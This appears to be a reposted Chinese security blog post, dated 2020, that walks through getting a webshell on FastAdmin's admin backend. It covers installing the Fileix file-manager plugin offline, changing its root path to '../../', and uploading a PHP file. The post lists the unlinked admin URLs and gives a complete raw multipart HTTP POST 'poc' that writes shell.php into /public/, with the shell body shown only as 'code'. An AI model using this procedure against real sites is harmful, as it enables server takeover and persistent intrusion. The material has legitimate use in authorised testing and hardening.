专栏首页小白帽学习之路FastAdmin后台GetShell

FastAdmin后台GetShell

0x01 前言

FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

0x02 本地测试

FastAdmin官方源码下载地址:

https://www.fastadmin.net/download.html

开启phpstudy本地搭建

安装成功,新版源码的后台地址是随机生成的

后台默认会有插件管理功能,但是绝大部分用户会把这个功能阉割掉

点进去看到有一堆付费和免费的插件

翻到了目前已有的三个官方发布的在线文件管理器插件,一个是官方付费版,一个是三方付费版

但是由于舍不得花十块钱买插件,所有只能用三方免费版插件,直接点击安装会需要登录账号,登录信息会记录到日志,不便于操作,所以去官方下载离线安装包

Fileix文件管理器离线安装包官方下载地址:

https://www.fastadmin.net/store/fileix.html

点击离线安装,选择上传你下载的ZIP离线安装包

插件安装完成会自动启用,默认路径配置是这样的

然后打开是这样的

可以修改为 ../../,那么再打开就是这样的

然后浅显易懂,直接右键上传php文件就能getshell

上面是本地测试环境,真实环境会出现这样一个问题,就是点击文件管理功能不会显示任何内容

后来了解一下是因为没有配置前台页面,不太好修改,所以利用下面的方法

0x03 通用方法

1.插件管理地址:

/admin/addon?ref=addtabs

进入后台默认不显示插件管理功能,访问插件管理地址,上传离线安装包

2.文件管理地址/读取所有文件地址:

/admin/fileix?ref=addtabs
/admin/fileix/lst

真实环境中如果出现不显示功能的情况,必要时可以读取所有文件地址

3.上传poc:

POST /admin/fileix/data?target=%2F HTTP/1.1
Host: localhost
Content-Length: 1050
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWST
Accept: */*
Referer: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=xxxxxxxx
Connection: close

------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: application/octet-stream

code
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryrZmyeAB3SciJDWST
Content-Disposition: form-data; name="target"

/public/
------WebKitFormBoundaryrZmyeAB3SciJDWST--

修改host地址post过去

利用poc成功上传shell

本文分享自微信公众号 - 程序员阿甘(gh_a2e36d69d566),作者:nearsec

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-06-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Postgresql 渗透利用总结

    将文件分成小于2KB大小的hex在上传,在9.6版本中切割必须等于2KB才能上传成功。先创建一个OID作为写入对象,然后通过0,1,2,3……分片上传,最后倒入...

    7089bAt@PowerLi
  • 思路分享 | 从零模拟一次实战记录并成功提权

    前天下午,风和日丽,我呆呆的坐在电脑前,思考着我存在的意义。这时,大佬突然走进机房,扔给我了一个靶机,让我搞定它。瑟瑟发抖的我,也不敢问什么,扛着靶机来到了一个...

    7089bAt@PowerLi
  • 强烈推荐 16 款 IDEA 插件,让你的开发速度飞起来

    当前使用的IDEA版本是2020.1。随着IDEA版本的升级,有些插件不再支持,而有些插件变成了收费插件,这些插件将不再推荐。以下列举的,都是亲测可以在2020...

    7089bAt@PowerLi
  • FastAdmin后台GetShell

    FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

    周俊辉
  • 如何安装Pycharm官方统计代码行插件

    Jetpropelledsnake21
  • android gridview几个重要属性(android:listSelector自带内部padding分析)

    一、android:scrollbarStyle  决定状态条的位置 常用属性outsideOverlay,滚动条在最外层,gridview设置的paddin...

    用户1155943
  • IDEA界面太丑??尝试一下这几个插件!

    IntelliJ IDEA主要用于支持 Java、Scala、Groovy 等语言的开发工具,同时具备支持目前主流的技术和框架,擅长于企业应用、移动应用和 We...

    乱敲代码
  • IDEA主题美化

    IntelliJ IDEA主要用于支持 Java、Scala、Groovy 等语言的开发工具,同时具备支持目前主流的技术和框架,擅长于企业应用、移动应用和 We...

    说故事的五公子
  • 你必须知道的Chrome插件,大牛都在用!

    很多人可能不知道,Chrome 最强大的地方其实在于它的第三方插件, 后台回复 "chrome" 获取插件

    Python编程与实战
  • 你必须知道的Chrome插件,大牛都在用!

    说到浏览器我相信大多数人都会首推 Chrome 浏览器,尤其是程序员最喜欢用 Chrome

    材ccc

扫码关注云+社区

领取腾讯云代金券